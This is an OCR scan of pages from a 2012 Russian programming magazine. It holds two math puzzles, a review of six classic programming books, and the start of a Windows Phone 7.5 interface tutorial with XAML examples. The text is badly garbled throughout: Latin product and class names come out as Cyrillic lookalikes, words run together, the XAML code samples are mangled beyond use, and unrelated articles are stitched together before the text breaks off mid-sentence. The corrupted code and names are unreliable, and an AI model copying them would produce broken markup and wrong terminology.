3. Четыресобаки находятся вуглахбольшого 
квадрата. Каждая изсобакначинаетпре- 
следовать другую собаку, расположенную 
от нее по ходу часовой стрелки. Все собаки 
бегут с одинаковой скоростью, причем они 
постоянно меняют направление своего 
движения так, чтобы преследовать строго 



по прямой ту собаку, за которой гонятся. 
Сколько времени пройдет, пока собаки 
поймают друг друга? Где это произойдет? 

4. Из Лос-Анджелеса в Нью-Йоркотправля- 
ется поезд с постоянной скоростью 15 миль 
в час. Одновременно из Нью-Йорка в Лос- 
Анджелес потомуже пути отправляется 
встречный поезд со скоростью 20 миль в час. 
Втотжесамый момент из Лос-Анджелеса с 
вокзала вылетаетптица и летитстрого над 
железнодорожной колеей по направлению 
к Нью-Йорку со скоростью 25 миль в час. Как 
только она долетает до поезда, вышедшего 
из Нью-Йорка, она немедленно разворачи- 
вается и летит в обратную сторону с той же 
скоростью, пока не встретится с поездом, 
вышедшим из Лос-Анджелеса, послечего 
снова разворачивается и летит в обратном 
направлении. Так она л етаеттуда и обратно 
междудвумя поездами, пока они не стол- 
кнутся. Какое расстояние пролетит птица? 
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Артем Табалин, инженер-программист ОеѵЕхргезБ (ІаЬаІіпазйдтаіІ.сот) 




главных книг 

о кодинге 

ИХ ДОЛЖЕН ПРОЧИТАТЬ КАЖДЫЙ, 

КТО СЧИТАЕТ СЕБЯ ПРОГРАММИСТОМ! 




Все мы прекрасно понимаем: 
чтобы стать профессиональным 
программистом, необходимо 
читать специализированную 
техническую литературу. Но на 
сегодняшний день доступно 
огромное количество различных 
изданий по программированию. 
Целой жизни не хватит, чтобы 
одолеть и половину из них. 

Какие же книги нужно читать 
в первую очередь? Без каких 
книг нельзя обойтись? В этой 
статье мы расскажем о тех трудах 
великих авторов, с которыми 
должен быть знаком каждый 
профессиональный разработчик. 



птш 

В этой статье 
мы рассмотрели 
не все книги из 
золотого фонда 
программерской 
мысли. Следующую 
подборку книг 
ты найдешь в 
октябрьском 
номере ][. 




6 главных книг о кодинге 



С. Макконнелл 

«Совершенный код» 

Пишите код так, как будто сопровождать его будет склонный 
к насилию психопат, который знает, где вы живете. 



М. Фаулер 

«Рефакторинг» 



С Ылні:ніі*Гіі1 



СОВЕРШЕННЫЙ КОД 

гріі.пі-асчп г»ри*4іК:мщ>мти1йгіР 



■ ложно наити гуру програм- 
Г мирования, который не читал 
I I «Совершенный код» Стива 
Макконнелла. Действительно, одна 
книга, хоть и немаленькая (чуть менее 
900 страниц), покрывает практически 
все аспекты разработки ПО: от рецептов 
написания высококачественного кода, 
механизмов тестирования и отладки 
до стратегий оптимизации кода и пси- 
хологических факторов, влияющих на 
разработку. Представь себе: библио- 
графия книги занимает 20 страниц и 
содержит более 500 источников! Книга 
«Совершенный код» — одно из самых 
полезных и, как следствие, популяр- 
ных изданий по разработке ПО. Она 
неоднократно доказала это, возглавляя 

рейтинги книг по программированию ( доо.дІ/ЗдОкх ). Благодаря простой 
манере изложения, особому стилю и чувству юмора Стива книга читается 
очень легко. 

Говоря о проектировании и конструировании программных систем, 
Макконнелл выделает Главный Технический Императив Разработки 
ПО — управление сложностью. Простота и ясность исходного кода и 
архитектуры системы определяют ее качество. Большая часть книги 
посвящена написанию высококачественного кода. Макконнелл, как 
никто другой, осознавая значимость мелочей, детально описывает все 
правила, которыми следует руководствоваться при написании хороше- 
го кода. Необходимый уровень абстракции, разработка качественных 
интерфейсов классов, написание высококачественных методов, выбор 
удачных имен переменных — ничто не ускользает от внимания автора. 
Например, общим принципам использования переменных отведен целый 
раздел книги более чем на 100 страниц. При этом все правила и советы 
даются исключительно с практической точки зрения. 

Макконнелл формулирует Главный Закон Качества ПО: повышение 
качества системы снижает расходы на ее разработку. Причина ясна — 
большую часть времени программисты занимаются чтением и отладкой 
написанного кода, тогда как на собственно написание уходит около 10% 
рабочего времени. Поэтому поддержание качества кода системы на 
высоком уровне экономит много времени и тем самым повышает КПД 
программиста. 

Автор не обходит вниманием и различные методики разработки. Под- 
робно описывается парное программирование, ревизии кода, разработка 
на основе тестирования. «Рефакторинг» — единственная глава книги, 
которую можно назвать «слабоватой». При рассмотрении методов рефак- 
торинга приводится лишь длинный список его видов из книги М. Фаулера 
«Рефакторинг». При этом нет ни одного конкретного примера кода. 

Говоря о повышении производительности ПО, автор приводит убеди- 
тельные доводы против преждевременной оптимизации, когда про- 
граммист в процессе разработки интуитивно распознает «узкие» места в 
программе и незамедлительно принимает меры по оптимизации в ущерб 
качеству кода. Приводимая статистика показывает, что в 9 из 10 своих 
предположений программист ошибается. 

Подвести итоги можно словами Джона Роббинса: «Это просто самая 
лучшая книга по конструированию ПО из всех, что когда-либо попада- 
лись мне в руки. Каждый разработчик должен иметь ее и перечитывать 
от корки до корки каждый год. Я ежегодно перечитываю ее на протяже- 
нии вотуже девяти лет и все еще узнаю много нового!» 



Написать код, понятный компьютеру, может каждый, но только 
хорошие программисты пишут код, понятный людям. 



п 



рактически любое издание 



Рефакторинг 

УПУЧ1Ш1ИЕ 

іхщттшщч щи 




о рефакторинге ссылается 
на книгу Мартина Фаулера 
«Рефакторинг». Причина ясна: в этой 
книге Фаулер сделал невозможное — 
в предельно понятной форме донесдо 
читателей исчерпывающее описание 
понятия «рефакторинг», раскрыл его 
назначение, особенности и методы 
реализации. 

При немалом объеме (400 страниц) 
книга читается буквально за пару 
вечеров, от нее просто невозможно 
оторваться. Главная причина голо- 
вокружительного успеха книги — ее 
практическая направленность. Все 
мы знаем, что самая сложная задача 
при подаче материала — привести 

хороший показательный пример. В этом Фаулеру нет равных. Книга начи- 
нается с примера улучшения кодакода — и этот пример сразу с головой 
затягивает читателя в мир рефакторинга. Всего 40 страниц дают нам 
вполне конкретное представление о рефакторинге, его целях, принци- 
пах и основных методах реализации. 

Мартин определяет рефакторинг как «изменение во внутренней 
структуре ПО, имеющее целью облегчить понимание его работы и упро- 
стить модификацию, не затрагивая наблюдаемого поведения». Но когда 
необходимо проводить данное изменение? Какой коддолжен подвер- 
гаться переработке? Автор дает подробные ответы на эти вопросы. Он 
вводит правило «трех ударов»: «После трех ударов начинайте рефакто- 
ринг». То есть когда вы делаете что-то аналогичное в третий раз, это сиг- 
нал для начала рефакторинга. Раздел «Код с душком» дает нам четкое 
представление о том, какой же код требуетулучшения. К признакам та- 
кого кода относятся: длинный метод, большой класс, дублирование кода, 
длинный список параметров метода, временные поля и многое другое. 

Фаулер, как сторонник ЮБ (Тезі-сіпѵеп беѵеіортепі), посвящает 
главу книги созданию автоматических тестов и описанию среды ЛІпіЕ 
Перед проведением рефакторинга следует написать тест для улучшае- 
мого кода, чтобы обеспечить неизменность его поведения, и только 
после этого смело вносить изменения. 

Большую часть книги занимает каталог методов рефакторинга. Он 
содержит разделы, посвященные составлению методов, перемещению 
функций между объектами, организации данных, упрощению условных 
выражений и вызовов методов, решению задач обобщения и крупным 
архитектурным рефакторингам. Многие из методов рефакторинга авто- 
матизированы в популярных ЮЕ. Например, ѴізиаІ Біисііо предоставляет 
возможности по автоматическому выделению метода (ЕхІгасіМеіЬосІ), 
удалению параметра (РетоѵеРагатеІег), выделению интерфейса 
(Ехігасііпіегі'асе) и др. В качестве крупных рефакторингов уровня систе- 
мы Фаулер приводит следующие: разделение иерархии наследования, 
выполняющей более одной задачи, переход от процедурного подхода к 
объектно-ориентированному, отделение предметной области отуровня 
представления, а также выделение иерархии, подразумевающее раз- 
биение большого класса на целую иерархию значительно меньших по 
размеру и более специализированных подклассов. 

Прочитав эту книгу, большинство программистов изменяет свой под- 
ход к написанию кода. Они становятся более грамотными, аккуратными и 
внимательными к своему творению. Книга обязательна к прочтению для 
всех программистов, стремящихся к совершенству в своем ремесле. 



ХАКЕР 09/164/2012 



095 








кодинг 



Э. Гамма, Р. Хелм, Р. Джонсон, Д. Влиссидес 

«Паттерны проектирования» 

Проектирование объектно-ориентированных программ — нелегкое дело, 
а если их нужно использовать повторно, то все становится еще сложнее. 



Э. Хант, Д. Томас 

«Программист-прагматик» 

Программисты-прагматики не уклоняются от ответственности. Вместо 
этого они испытывают радость, принимая вызовы и распространяя опыт. 



просите у опытного раз- 

Г работника, какую книгу по 

объектно-ориентированному 
программированию вам обязательно 
стоит прочитать. В абсолютном боль- 
шинстве случаев он посоветует именно 
эту. В отношении данной книги слово 
«бестселлер» звучит недостаточно вы- 
разительно, ведь с момента ее выпуска 
было продано уже более полумиллиона 
экземпляров. 

Очень часто начинающий разработ- 
чик самостоятельно берется за решение 
уже более тысячи раз решенной до него 
задачи проектирования и изобретает 
очередную разновидность пятико- 
лесного велосипеда, истинно гордясь 
своим «новшеством». Владение языком 
паттернов позволяет решить множество задач проектирования наиболее 
оптимальным способом, затрачивая при этом минимум усилий. Всего 
двадцать описанных в книге паттернов предоставляют инструментарий 
для решения огромного спектра задач проектирования ПО. 

Материал книги довольно сложен и требует от читателя определен- 
ных знаний в области объектно-ориентированного проектирования. Для 
освоения паттернов недостаточно просто прочитать книгу, необходимо 
основательно над ней «попотеть». Впрочем, твои усилия не пройдут 
даром. Книга содержит 350 страниц и состоит из двух частей. В первой 
части дается общее понятие паттернов проектирования, описывается их 
практическое применение на примере создания визуального редактора 
документов І_ехі. Вторая часть книги содержит каталог паттернов с под- 
робным описанием назначения, структуры, особенностей реализации и 
примерами применения каждого паттерна. 

Коллектив авторов известен как Сапд о{ Роиг («Банда четырех»), поэ- 
тому представленные в книге паттерны называют (ЗоР. Авторы разбивают 
все множество представленных паттернов на три группы: порождающие 
паттерны, структурные паттерны и паттерны поведения. Порождающие 
паттерны решаютзадачу инстанцирования (создание экземпляров) 
классов. К самым популярным паттернам в данной группе можно от- 
нести АЬзІгасіРасІогу (абстрактная фабрика), РасІогуМеіЬосІ (фабричный 
метод) и Біпдіеіоп (одиночка). Структурные паттерны предназначены для 
решения вопросов компоновки системы на основе классов и объектов. К 
ним относятся такие важнейшие паттерны, как Абаріег (адаптер), Вгібде 
(мост), Сотрозііе (компоновщик), Ргоху (заместитель) и Расабе (фасад). 
Паттерны поведения связаны с алгоритмами и вопросами распределения 
обязанностей между классами. Здесь необходимо упомянуть Бігаіеду 
(стратегия), ТетрІаІеМеіИосІ (шаблонный метод), ОЬзегѵег (наблюдатель), 
Соттапб (команда) и Кегаіог (итератор). 

Единственное, что может смутить читателя, — некоторые примеры в 
книге написаны на малоизвестном на сегодняшний день языке програм- 
мирования БтаІІІаІк, а для изображения диаграмм классов вместо при- 
вычного ІІМІ_ используется ОМТ (ОЦес* Мобеііпд ТесЬпщие). 

Гуру ООАиП Мартин Фаулер пишет: «Паттерны 6оР — это лучшая из 
когда-либо изданных книг по объектно-ориентированному проектиро- 
ванию. Эта книга чрезвычайно влиятельна в индустрии программного 
обеспечения — только посмотрите на библиотеки Эаѵа и .ЫЕТ, которые 
буквально кишат паттернами 6оР». Не существует специалиста в области 
объектно-ориентированного проектирования, незнакомого с паттернами 
СоР, а если такой и есть, то в этом случае его, скорее всего, нельзя на- 
звать специалистом. 



нига «Программист- 

| прагматик» полностью 
оправдывает свое на- 
звание. Викисловарь говорит, что 
прагматик — это тот, «кто ставит 
практическую полезность, вы- 
году выше всего». Программисты- 
прагматики ориентируются в 
первую очередь на практическую 
успешность реализуемых проектов. 

Авторы на основании своего бога- 
тейшего опыта программирования 
создали структурированный набор 
практических советов для програм- 
мистов. Небольшой размер книги 
(270 страниц) говорит о высокой 
концентрации важной для програм- 
миста информации. 

Практически все излагаемые в книге темы поясняются вырази- 
тельными аналогиями, которые порой поражают своей точностью. 

В книге проводятся параллели между некачественным кодом и 
теорией разбитого окна, столярным делом и работой программиста, 
вождением автомобиля и написанием кода, стрельбой трассирующи- 
ми пулями и созданием прототипов ПО, хождением по минному полю 
и программированием в расчете на стечение обстоятельств. В конце 
каждого раздела приводятся вопросы для обсуждения и упражне- 
ния, что лишний раз подчеркивает практическую направленность 
книги. 

Одним из самых замечательных принципов программирования, 
которым мы обязаны авторам, является принцип ОРУ Шоп'І Ререаі 
ѴоигзеК), что в переводе на русский означает: «Не повторяй самого 
себя». Это подразумевает, что каждый фрагмент знания должен 
иметь единственное и однозначное представление в системе. Следо- 
вание данному принципу позволяет повысить надежность, доступ- 
ность и простоту сопровождения программного продукта. 

В главе, посвященной общей философии прагматичного про- 
граммирования, мы узнаем, каким авторы видят программиста- 
прагматика: он всегда принимает ответственность за свой код, 
следитза состоянием своего продукта, постоянно совершенствуется, 
общается и находит компромисс с пользователями. Глава «Праг- 
матический подход» говорит об общих методиках разработки и 
оценки трудоемкости проектов. Важнейшая глава «Гибкость против 
хрупкости» рассказывает, каким же образом необходимо создавать 
действительно гибкие и устойчивые к изменению системы. Из главы 
«Перед тем, как начать проект» можно узнать о процедуре формиро- 
вания и утверждения требований к системе. «Прагматические про- 
екты» знакомят нас с критическими аспектами создания реальных 
проектов, такими как работа в команде, тестирование и формирова- 
ние документации. 

Единственное, что может подпортить впечатление о книге, так 
это недостаточно качественный перевод на русский язык и нали- 
чие множества опечаток. Книгу лучше всего читать в оригинале на 
английском языке. 

Нельзя не согласиться с отзывом Кента Бека: «Главное в этой 
книге то, что она поддерживает процесс создания программ в 
хорошей форме. [Книга] способствует вашему постоянному росту 
и явно написана людьми, знающими толк в программировании». 
Если вы стремитесь к постоянному росту как программист, эта 
книга обязательна к прочтению. 
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6 главных книг о кодинге 



Д. Кнут 

«Искусство программирования» 

Лучший способ в чем-то разобраться до конца — 
это попробовать научить этому компьютер. 



рограммист, у которого нет 
книги «Искусство програм- 
мирования», как священно- 
служитель, у которого нет Библии. 

Монографию Дональда Кнута часто 
называют «Библией программиста». 

Она содержит подробное описание и 
анализ важнейших фундаментальных 
алгоритмов, используемых в информа- 
тике, а также множество практических 
задач для усвоения и закрепления 
представленного материала. Журнал 
Атегісап Бсіепіізі включил работу 
Кнута в список двенадцати лучших 
физико-математических монографий 
XX века наряду с работой Эйнштейна 
по теории относительности. Успех кни- 
ги определило качество изложения и 
глубина анализа общих вопросов программирования. 

Кнут начал работу над «Искусством программирования» еще в 1962 
году. По замыслу автора монография должна состоять из семи томов. 
Пока было изданотри первыхтома, а также первая половина четверто- 
го. Все изданные на сегодняшний день материалы составляют почти 
3000 страниц. Читать книгу совсем не просто (как, впрочем, и Библию), 
главным образом потому, что все примеры рассматриваются на низко- 
уровневом языке программирования — ассемблере для гипотетического 
выдуманного автором компьютера МІХ. Поэтому у программиста вряд ли 
получится использовать книгу в качестве набора готовых рецептов для 
решения конкретных задач. Эта книга дает программисту не рыбу, а ско- 
рее хорошую удочку, с помощью которой он сможет не без определенных 
усилий самостоятельно наловить рыбы. 

Первый том посвящен основным алгоритмам и состоит из двух глав. 
Первая глава подготавливает читателя к работе над книгой. Здесь рас- 
сматриваются основные математические понятия и теоремы, на которых 
базируется весь материал. Читатель знакомится с «полиненасыщенным 
компьютером» МІХ, его архитектурой и его языком ассемблера. Вторая 
глава посвящена информационным структурам и алгоритмам работы с 
ними. Здесь рассматриваются деревья, многосвязные структуры, линей- 
ные списки, в том числе стеки, очереди, деки, циклические и дважды 
связанные списки и прочее. 

Второй том включает в себя третью и четвертую главы. Третья глава 
посвящена работе со случайными числами и последовательностями. В 
четвертой главе описываются вопросы арифметики, а именно различ- 
ные виды систем счисления, арифметика чисел с плавающей точкой и 
рациональных чисел, полиномиальная арифметика и другое. Третий том 
посвящен алгоритмам сортировки и поиска (соответственно, главы 5 и 6). 
Из четвертого тома опубликованы материалы седьмой главы, описываю- 
щей вопросы комбинаторного поиска. 

Исходя из планов автора, в четвертый том также войдет восьмая гла- 
ва, в которой рассматриваются рекурсивные алгоритмы. Пятый том будет 
содержать материалы по синтаксическим алгоритмам, в том числе по 
лексикографическому и синтаксическому поиску. Ожидающие издания 
шестой и седьмой тома будут посвящены теории языков и компиляторам. 

В своем отзыве о работе Кнута Билл Гейтс сказал: «Если вы считаете 
себя действительно хорошим программистом... прочитайте „Искусство 
программирования" (Кнута)... Если вы сможете прочесть весь этоттруд, 
то вам определенно следует отправить мне резюме». Цитата лишний раз 
подчеркивает, что, несмотря на сложность материала, настоящий про- 
фессионал обязательно должен осилить труд Дональда Эрвина Кнута. 



Р. Мартин 

«Чистый код» 

Умение писать чистый код — тяжелая работа. Она не ограничивается 
знанием паттернов и принципов. Над кодом необходимо попотеть. 

нига «Чистый код» 

||^ — одно из наиболее 

удачных изданий, по- 
священных написанию высоко- 
качественного кода. Размер книги 
около 400 страниц. При этом она 
настолько увлекательна и доступ- 
на, что за два-три вечера запросто 
прочитаешь ее от корки до корки. 

В дружеской манере «дядюшка» 

Боб рассказывает нам, какими же 
принципами нужно руководство- 
ваться, чтобы писать хороший код. 

Книга изоби-лует примерами из 
реальных при- 
ложений, с которыми автор стал- 
кивался в своей практике. Среди 
них такие известные продукты, 
как ЛІпіІ, РШМеззе, ЭйерепсІ, Апі и ТотСаС 

Книга разделена на три части. Первая часть — теория написания 
«чистого» кода: приемы, паттерны и принципы, которым необходимо 
следовать разработчику. Вторая часть носит практический характер и 
подробно описывает сам процесс «чистки» кода существующих при- 
ложений. Третья часть подводит итоги всей книги и содержит перечень 
«запахов кода» и методов их устранения. 

В теоретической части подробно описываются принципы имено- 
вания переменных, методов и классов, правила создания функций, 
написания комментариев, форматирования кода и написания модуль- 
ных тестов. Роберт дает понять, что хорошо написать код недостаточно. 
Необходимо поддерживать его чистоту с течением времени, чтобы 
предотвратить «загнивание». Поэтому он вводит «правило бойскау- 
та»: «Оставь место стоянки чище, чем оно было до твоего прихода». 

При создании функций во главу угла ставятся компактность, правило 
одной операции и одного уровня абстракции. Будучи ярым адептом Юй, 
Мартин указывает на важность «чистоты» не только кода конечного 
продукта, но и кода модульных тестов. Он иронически замечает: «Каки- 
ми отличительными признаками характеризуется чистый тест? Тремя: 
удобочитаемостью, удобочитаемостью и удобочитаемостью». 

В начале книги Роберт приводит ответы мэтров программирования 
на вопрос, что же такое «чистый код». Грэди Буч отвечает: «Чистый код 
прост и прямолинеен. Чистый код читается, как хорошо написанная 
проза». Программисты, которые стремятся писать «чистый код», просто 
обязаны прочитать эту книгу. 



ЗАКЛЮЧЕНИЕ 

Значение хороших книг по программированию сложно пе- 
реоценить. Каждая из описанных книг позволяет совершить 
огромный скачок в развитии. «Искусство программирова- 
ния» закладывает прочный фундамент, обучая нас фунда- 
ментальным алгоритмам и приемам программирования. 
«Совершенный код» позволяет выйти на новый качествен- 
ный уровень конструирования ПО. «Чистый код» и «Рефак- 
торинг» учат нас внимательнее относиться к качеству кода 
и поддерживать его в идеальном состоянии. «Программист- 
прагматик» подсказывает, как же реально добиться прак- 
тического успеха при разработке ПО. «Паттерны проекти- 
рования» вооружают тяжелой артиллерией паттернов для 
решения множества задач проектирования. □С 
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Юрий «уигетЬо» Язев (уаіеѵзоНЙдтаіІ.сот) 



Расе (И 

ѴѴіпсІоѵѵз 
РЬопе 



ПРОГРАММИРОВАНИЕ 
ИНТЕРФЕЙСОВ 
ДЛЯ ѴѴР 7.5 В ГОТОВЫХ 
РЕЦЕПТАХ 



В прошлом номере я обещал написать для 
тебя статью с кодерскими рецептами, но уже 
про интерфейсы. Держи обещанное! Прочитав 
эту статью, без всякой подготовки ты сможешь 
сделать вполне современный, динамичный 
и зависящий от показаний акселерометра 
фейс для своей программы. 
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Расе 0 І" ѴѴіпсІоѵѵз РЬопе 



ВООРУЖАЕМСЯ 

Основное оружие в борьбе за интерфейсы — это мощная интегри- 
рованная среда разработки ѴізиаІ Зіисііо 2010. В спину ей дышит 
редактор для визуального моделирования Ехргеззіоп ВІепсІ; 
для разработки ѴѴіпсІоѵѵз РЬопе приложений он бесплатный, в от- 
личие от своего десктопного аналога. Визуальное наполнение 
ОС ѴѴіпсІоѵѵз Рбопе отображается (и, разумеется, модулируется) 
средствами ЗіІѵегІідбЕ На момент написания этих строк вышла 
уже пятая версия ЗіІѵегІідЫ, но в ѴѴР по-прежнему используется 
предыдущая, четвертая версия. 

ХАМІ_ 

Для описания пользовательского интерфейса приложений 
для ѴѴіпсІоѵѵз РЬопе, равно как и других видов ЗіІѵегІідЫ- и ѴѴРР- 
приложений, используется декларативный языкХАМІ.. Он пред- 
ставляет собой расширенный язык разметки наподобие ХМІ_. ХАМІ_ 
появился вместе с третьей версией .І\ІЕТ в конце 2006 года и благо- 
даря своему удобству стал очень широко распространен. ХАМІ_ 
наследует описательную гибкость ХМІ_, позволяя легко дополнять 
существующие схемы новыми элементами. Давай рассмотрим эле- 
менты языка и увидим, что с их помощью можно сделать. 



РЕЦЕПТ 1 . ГЕОМЕТРИЯ 

Вначале посмотрим на создание геометрических объектов. В студии 
создай новое ЗіІѵегІідЫ-приложение для ѴѴР. Сейчас наше внима- 
ние будет приковано к файлу МаіпРаде.хатІ, но сначала взгляни 
внутрь файла Арр.хатІ. Он интересен тем, что в нем определяются 
четыре жизненно важных для каждого ѴѴР-приложения события: 
АррІісаІіоп_І_аипсЫпд, АррІісаІіоп СІозіпд, АррІісаІіоп_АсІіѵаІесІ, 
АррІісаІіоп_ОеасІіѵаІесІ. Подробнее о них я уже рассказывал (в мар- 
товской статье). Описания функций для этих событий содержатся 
в файле Арр.хатІ. сз. 

Для удобства из файла МаіпРаде.хатІ удали содержимое тега 
ОгісІ, который имеет атрибут х:І\Іате="І_ауоіііРооГ. Тем самым 
с экрана эмулятора телефона будет удалено все лишнее. 

Всего в ЗіІѵегІідЫ содержится шесть геометрических примитивов: 
прямая линия, ломаная линия, прямоугольник, многоугольник, эллипс 
и путь. Строго говоря, путь является основным типом геометрии, так 
как все остальные строятся на его основе. К примеру, чтобы нарисо- 
вать кривую, используя метод Безье, достаточно написать: 

<Ра1:Іі 51=гоке="1лІІіі'Ь е"> 

<Ра1:Іі.Оа1:а> 

<Ра1:ІіСеоте1:гу> 

<Ра1:ІіРі^иге $1:аг1:Роіп1:="5Ѳ. 50"> 

<Ве2Іег5е§теп1: Роіп-ЕІ^'БѲѲ^" Роіп1:2= ,, 5Ѳ0 : , 200" 

Роіп1:3= ,, 150,300 , 7> 

</Ра1:ІіРі§ипе> 

</Ра1:ІіСеоте1:гу> 

<УРа1:Іі.Оа1:а> 

</Ра1=И> 

В первой строке задается цвет контура для рисования, сле- 
дующим тегом начинается область описания данных пути, тег 
<РаіЬ6еотеІгу> сообщает компилятору, что далее идут данные, 
определяющие геометрию: задается сегмент, состоящий из трех 
точек, каждая со своими координатами. Чтобы изобразить эллипс 
красного цвета, достаточно одной строчки кода: 

<Е11ірзе ІМате^'еІІірзеІ" 51:гоке= ,, КесІ" 
Маг§іп="53,544,227,124" /> 

Как и в НТМІ_, многие объекты в ЗіІѵегІідЫ можно описать по- 
добными сокращенными записями. 



ЖИЗНЕННЫЙ ЦИКЛ МОБИЛЬНОГО 
ПРИЛОЖЕНИЯ С ТОЧКИ ЗРЕНИЯ 
ПОЛЬЗОВАТЕЛЯ 



1. Поиск нужного приложения. 

2. Нахождение + чтение описания и просмотр титульной 
картинки (очень важный этап, успех которого означает переход 
к следующему). 

3. Скачивание + испытание демо. 

4. Покупка полной версии. 

5. Использование приложения. 

6. Удаление. 

Пользовательский интерфейс играет важнейшую роль на двух 
этапах (3 и 5). 



Можно еще более сократить приведенную выше запись, удалив 
атрибут ІЧате (он нужен только в том случае, если к объекту 
будет планироваться обращение из кода). В последнем атрибу- 
те задаются координаты и размеры примитива. Заметь, четыре 
значения определяют ІеК, Іор, гідЫ:, Ьоиот — поля отступа от 
соответствующих краев объекта родителя. В дополнение к рас- 
смотренным все примитивы обладают другими стандартными 
атрибутами: ѴѴісШо, НеідЫ:, РіІІ. Первые два задают ширину и высоту 
примитива, а последний — цвет для закраски. Кроме того, для 
закрашивания фигуры служат пять стилей, каждый из которых 
красит примитив особым образом: ЗоіісіСоіогВгіізЬ красит сплош- 
ным цветом, ЫпеагЗгасІіепіВгизЬ красит линейным градиентом, 
РасІіаІЗгасІіепіВгизЬ — радиальным градиентом (то есть в этом 
случае цвет меняется по окружности, начиная от центральной 
точки до точки, находящейся на краю области закрашивания), 
ІтадеВгизЬ — вместо закраски цветом используется наложение 
текстуры, ѴісІеоВгизЬ — то же самое, что в предыдущем случае, 
только используется вывод видео. 

Испробуем дополнительные атрибуты: создадим закрашенный 
прямоугольник, применяя стиль радиального градиента: 

<Кес1:ап§1е Маг§іп="275. 526. 28.83 "> 

<Кес1=ап^1е. Г і11> 

<КасІіа1СпасІіеп1:Впи5Іі> 

<СгасІіеп1:51:ор Со1ог="Уе11оы" О-р-Рзе1:= ,, 0. 2" /> 

<6гасІіеп1:51:ор Со1ог="ЫІіі1:е" О-Р-Рзе1:="0.б" /> 
<6гасІіеп1:51:ор Со1ог="В1ие" 0-р-Рзе1:= І, 1" /> 
</Кас1іа16гас1іеп1:Вги5Іі> 

</Кес1:ап^1е. Рі11> 

<УКес1:ап§1е> 



ВИЗУАЛЬНОЕ НАПОЛНЕНИЕ ОС 
ЖШ00Ж5 РНОЫЕ ОТОБРАЖАЕТСЯ 
И, РАЗУМЕЕТСЯ, МОДУЛИРУЕТСЯ 
СРЕДСТВАМИ 5Н.ѴЕШ.І6НТ 
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РЕЦЕПТ 2. ЭЛЕМЕНТЫ УПРАВЛЕНИЯ 



К счастью разработчика, существует множество объектов управ- 
ления (компонентов), с помощью которых можно компоновать 
приложение, а пользователи затем могут им управлять; количе- 
ство объектов можно пополнять. В этом рецепте мы рассмотрим 
лишь небольшую их часть, выделив их в обобщенные подгруппы, 
а с остальными ты разберешься по ходу дела, опираясь на общие 
свойства сгруппированных компонентов. 

Все контролы можно разделить на пять категорий: простые эле- 
менты управления, элементы с содержимым, списки, контейнеры 
и компоненты, присущие только смартфону. 

Пойдем по порядку. К простым элементам управления отно- 
сятся разные текстовые метки (ТехіВІоск), поля ввода (ТехіВох, 
РазвѵѵогсІВох), картинки компонент Ітаде, ползунки (БІісІег), полосы 
состояния (РгодгеззВаг) и другие. То есть это такие компоненты, ко- 
торые не могут содержать подобъекты. К элементам с содержимым 
относятся различные кнопки (объекты классов ВіШоп, РасІіоВииоп, 
НурегІіпкВииоп, СЬескВох) — благодаря свойству Сопіепі они могут 
содержать другие компоненты. Списки представляют собой кол- 
лекции для объектов определенного типа, таких как І_І5ІВохІІет, 
МепиІІет, Берагаіог и других. Главная роль списков — обеспечение 
набора однотипных элементов. Списки в БіІѵегІідЫ представлены 
классами ЫзіВох, СопІехіМепи, ЫзіРіскег, йаІеРіскег и другими. 

Как следует из названия, контейнеры предназначены для нако- 
пления и содержания других компонентов. Они не имеют визуаль- 
ного интерфейса, но позволяют создавать на экране смартфона 
определенную разметку, в которой может находиться произвольное 
количество дочерних элементов; последние могут быть представ- 




Рис. 1. Подключение сборки 

лены экземплярами любого класса. К контейнерам относятся че- 
тыре компонента: уже известный нам СгісІ, представляющий собой 
таблицу; БіаскРапеІ, имеющий вид строки или столбца, в котором 
могут находиться подобъекты; контейнер БсгоІІѴіеѵѵег позволя- 
ет прокручивать свое содержимое в случае, если оно занимает 
большее пространство, чем он сам; внутри канвы (Сапѵаз) можно 
произвольным образом размещать элементы, то есть в отличие от 
остальных этот контейнер не имеет строгой разметки. 

Последняя категория компонентов представляется мне наибо- 
лее интересной, поскольку не имеет аналогов в других реализациях 
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Рис. 3. Ріѵоі 



ѴѴР7.5 



Третьего июля вышло обновление 
под номером 7.10.8773.98, добавив- 
шее значительные, на мой взгляд, 
функции. Например, стало возмож- 
ным импортировать и экспортиро- 
вать контактные данные с телефона 
на 5ІМ-карту и обратно. Стабиль- 
ность и безопасность работы, будем 
надеяться, тоже были улучшены. 
Для этого М5 ведь и выпускает 
обновления? 



ІѴІѴІѴЛ 

ѵѵѵѵѵѵ.тісгозоН.сот — 

много полезной 
информации 
О ѴѴІПСІ0ѴѴ5 
РИопе,5іІѵегІідЫ 
и сопутствующих 
технологиях (ого, 
неплохой сайт! — 
Прим. ред.). 



гш 

На диске находятся 
все примеры, 
иллюстрирующие 
описанные в статье 
рецепты. 
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Расе о{ ѴѴіпсІоѵѵз РЬопе 



БіІѵегІідЫ, кроме ѴѴР. Вместе с тем эту категорию составляюттолько 
два объекта: Рапогата и Ріѵоі. Оба эти объекта позволяют создать 
особенный, состоящий из нескольких сменяющих друг друга па- 
нелей интерфейс. Для примера сделаем простенький интерфейс, 
с помощью которого можно было бы листать электронную версию 
любимого журнала :). Чтобы использовать контрол Рапогата (или 
Ріѵоі), необходимо в окне «АбсІ Реіегепсе» (Рго)есі -> АсИ Реіегепсе) 
добавить ссылку на сборку МісгозоІІ.РЬопе.СопІгоІз (рис. 1). 

Затем в коде надо подключить пространство имен: 

хтіпз : рап^с1г-патезрасе:Місгозо-Ріі. Рбопе. 

Сопігоіз.; аз5етЬ1у=Місго50-Р1і . Рбопе . Сопіігоіз " . 

Наконец, чтобы добавить панораму в приложение, напиши 
такой код: 

<рап : Рапогата Ті1:1е= ,, Хакер та§а 2 Іпе"> 

<рап : РапогатаІІіет НеасІег= ,, 1 ,, > 

</рап : РапогатаІ1іет> 

<рап : РапогатаІІіет НеасІег= ,, 2 ,, > 



РЕЦЕПТ 3. АРР ВАР 

Подобно тому как почти все оконные приложения (неважно, какой 
операционной системы — ѴѴіпсіоѵѵз, Ыпих или Мае ОБ) имеют 
строку меню и/или тулбар, программа для ѴѴР в подавляющем 
большинстве случаев тоже может иметь такой элемент управления. 
Однако с учетом Метро-стиля, когда приложения занимают весь 
экран, выглядит этот элемент иначе — он располагается внизу. 
Представлен он классом АррІісаІіопВаг; объект этого класса может 
содержать кнопки — экземпляры класса АррІісаІіопВагІсопВиІІоп 
и текстовые пункты меню — объекты класса МепііІІетз. Кнопки 
могут иметь картинки размером 48 х 48 пикселей; чтобы тебе не 
пришлось рисовать самому, Місгозоіі приготовила обширную 
коллекцию (находится она в папке с:\Ргодгат Рііез (х86)\Місгозо11 
